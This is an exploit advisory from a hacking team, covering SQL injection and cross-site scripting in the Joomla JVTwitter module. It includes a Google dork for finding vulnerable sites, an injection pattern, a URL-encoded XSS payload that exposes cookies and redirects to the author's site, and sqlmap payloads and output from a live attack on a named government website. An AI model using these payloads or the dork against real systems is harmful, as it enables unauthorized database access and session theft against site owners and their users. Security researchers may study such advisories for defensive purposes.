#############################################################
# Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
# Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id=
# Date: 2020-11-07
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: joomlavi.com
# Software Version: *
# Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html
# Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android
#############################################################
[*] Vuln Info:
==============
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code into a web page.
Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams.
#############################################################
[*] Exploit:
============
/modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I]
/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
#############################################################
[*] Demo:
=========
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=110 AND 6499=6499-- xBNX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel
---
[08:01:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1